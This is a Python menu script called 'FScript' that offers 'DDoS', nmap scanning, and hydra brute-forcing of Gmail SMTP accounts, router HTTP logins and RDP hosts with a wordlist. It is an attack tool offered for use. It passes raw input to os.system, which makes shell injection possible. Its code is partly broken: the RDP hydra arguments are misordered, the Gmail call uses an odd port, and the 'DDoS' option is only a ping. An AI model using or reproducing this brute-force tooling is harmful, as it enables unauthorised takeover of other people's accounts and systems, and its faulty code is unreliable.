#!/usr/bin/python
import sys, os, time

os.system("clear")


print ('''
       _______________
      |_|_|_|_|_|_|_|_|
      |_|_|_|_|_|_|_|_|
      |_|_|
      |_|_|_______
      |_|_|_|_|_|_|
      |_|_|_|_|_|_|
      |_|_|
      |_|_|
      |_|_|
      |_|_| SCRIPT.
''')
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("")
print("   1] DDoS")
print("")
print("   2] Scanning")
print("")
print("   3] BruteForcing")
print("")
print("")
print("")
FS = input("FScript:~$ ")

if FS == "01" or FS == "1":
  os.system("clear")
  print("")
  print("")
  print("")
  print("")
  print("")
  print("")
  print("")
  ip = input("(@)IP> ")
  os.system("ping %s " %(ip))
  
  

elif FS == "02" or FS == "2":
  os.system("clear")
  print("")
  print("")
  print("")
  print("")
  print("")
  print(" 1] Nmap")
  print("")
  print("")
  print("")
  print("")
  print("")
  FS1 = input("(@)Scanning> ")

  if FS1 == "01" or FS1 == "1":
    os.system("clear")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    ip = input("(@)IP> ")
    os.system("nmap %s " % (ip))

elif FS == "03" or FS == "3":
  os.system("clear")
  print("")
  print("")
  print("")
  print("")
  print("")
  print(" 1] Gmail BruteForcing")
  print("")
  print(" 2] Router BruteForcing")
  print("")
  print(" 3] RDP BruteForcing")
  print("")
  FS2 = input("(@)BruteForcing> ")
  if FS2 == "01" or FS2 == "1":
    os.system("clear")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    gmail = input("(@)Gmail> ")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    word = input("(@)Wordlist> ")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    os.system("clear")
    os.system("hydra -l %s -P %s -s 400 smtp.gmail.com smtp" % (gmail, word))
  if FS2 == "02" or FS2 == "2":
    os.system("clear")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    ip = input ("(@)IP/Hostname> ")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    login = input("(@)Login> ")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    word = input("(@)Wordlist> ")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    os.system("clear")
    os.system("hydra -m / -l %s -P %s %s http-get" % (login, word, ip))
  if FS2 == "03" or FS2 == "3":
    os.system("clear")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    ip = input ("(@)IP/Hostname> ")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    login = input("(@)Login> ")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    word = input("(@)Wordlist> ")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    print("")
    os.system("clear")
    os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (ip, login, word))







